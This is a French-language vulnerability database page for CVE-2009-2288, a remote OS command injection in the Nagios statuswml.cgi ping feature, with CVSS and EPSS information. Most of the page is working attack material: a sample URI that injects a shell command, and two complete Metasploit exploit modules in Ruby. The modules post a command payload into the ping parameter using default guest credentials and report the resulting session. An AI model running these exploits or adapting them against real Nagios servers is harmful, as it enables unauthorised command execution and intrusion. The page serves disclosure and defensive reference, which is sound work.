Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-78 |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 33051
Date de publication : 2009-05-21 22h00 +00:00
Auteur : Paul
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/35464/info
Nagios is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.
NOTE: For an exploit to succeed, access to the WAP interface's ping feature must be allowed.
Versions prior to Nagios 3.1.1 are vulnerable.
The following example URI is available:
https://www.example.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH
Exploit Database EDB-ID : 16908
Date de publication : 2010-07-13 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: nagios3_statuswml_ping.rb 9829 2010-07-14 18:23:47Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Nagios3 statuswml.cgi Ping Command Execution',
'Description' => %q{
This module abuses a metacharacter injection vulnerability in the
Nagios3 statuswml.cgi script. This flaw is triggered when shell
metacharacters are present in the parameters to the ping and
traceroute commands.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9829 $',
'References' =>
[
[ 'CVE', '2009-2288' ],
[ 'OSVDB', '55281'],
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => '<>',
'Compat' =>
{
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 22 2009'))
register_options(
[
OptString.new('URI', [true, "The full URI path to statuswml.cgi", "/nagios3/cgi-bin/statuswml.cgi"]),
OptString.new('USER', [true, "The username to authenticate with", "guest"]),
OptString.new('PASS', [true, "The password to authenticate with", "guest"]),
], self.class)
end
def exploit
print_status("Sending request to http://#{rhost}:#{rport}#{datastore['URI']}")
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['URI'],
'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") },
'vars_post' =>
{
'ping' => ';' + payload.encoded + '&'
}
}, 10)
if(not res)
if session_created?
print_status("Session created, enjoy!")
else
print_error("No response from the server")
end
return
end
if(res.code == 401)
print_error("Please specify correct values for USER and PASS")
return
end
if(res.code == 404)
print_error("Please specify the correct path to statuswml.cgi in the URI parameter")
return
end
if(res.body =~ /Invalid host name/)
print_error("This server has already been patched")
return
end
if(res.body =~ /p mode='nowrap'>(.*)<\/p>/smi)
print_status("Displaying command response")
out = $1
print_line(out.gsub(/<b>|<\/b>|<br.>/, ''))
return
end
print_status("Unknown response")
end
end
Exploit Database EDB-ID : 9861
Date de publication : 2009-10-29 23h00 +00:00
Auteur : H D Moore
EDB Vérifié : Yes
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Nagios3 statuswml.cgi Ping Command Execution',
'Description' => %q{
This module abuses a metacharacter injection vulnerability in the
Nagios3 statuswml.cgi script. This flaw is triggered when shell
metacharacters are present in the parameters to the ping and
traceroute commands.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-2288' ],
[ 'OSVDB', '55281'],
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => '<>',
'Compat' =>
{
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The full URI path to statuswml.cgi", "/nagios3/cgi-bin/statuswml.cgi"]),
OptString.new('USER', [true, "The username to authenticate with", "guest"]),
OptString.new('PASS', [true, "The password to authenticate with", "guest"]),
], self.class)
end
def exploit
print_status("Sending request to http://#{rhost}:#{rport}#{datastore['URI']}")
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['URI'],
'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") },
'vars_post' =>
{
'ping' => ';' + payload.encoded + '&'
}
}, 10)
if(not res)
if session_created?
print_status("Session created, enjoy!")
else
print_error("No response from the server")
end
return
end
if(res.code == 401)
print_error("Please specify correct values for USER and PASS")
return
end
if(res.code == 404)
print_error("Please specify the correct path to statuswml.cgi in the URI parameter")
return
end
if(res.body =~ /Invalid host name/)
print_error("This server has already been patched")
return
end
if(res.body =~ /p mode='nowrap'>(.*)<\/p>/smi)
print_status("Displaying command response")
out = $1
print_line(out.gsub(/<b>|<\/b>|<br.>/, ''))
return
end
print_status("Unknown response, displaying raw HTML")
print_line(res.body)
end
end
Products Mentioned
Configuraton 0
Nagios>>Nagios >> Version To (including) 3.1.0
Nagios>>Nagios >> Version 1.0
Nagios>>Nagios >> Version 1.0b1
Nagios>>Nagios >> Version 1.0b2
Nagios>>Nagios >> Version 1.0b4
Nagios>>Nagios >> Version 1.1
Nagios>>Nagios >> Version 1.4.1
Nagios>>Nagios >> Version 2.0
Nagios>>Nagios >> Version 2.0b4
Nagios>>Nagios >> Version 2.7
Nagios>>Nagios >> Version 2.10
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0
Nagios>>Nagios >> Version 3.0.1
Nagios>>Nagios >> Version 3.0.2
Nagios>>Nagios >> Version 3.0.3
Nagios>>Nagios >> Version 3.0.4
Nagios>>Nagios >> Version 3.0.5
Nagios>>Nagios >> Version 3.0.6
Références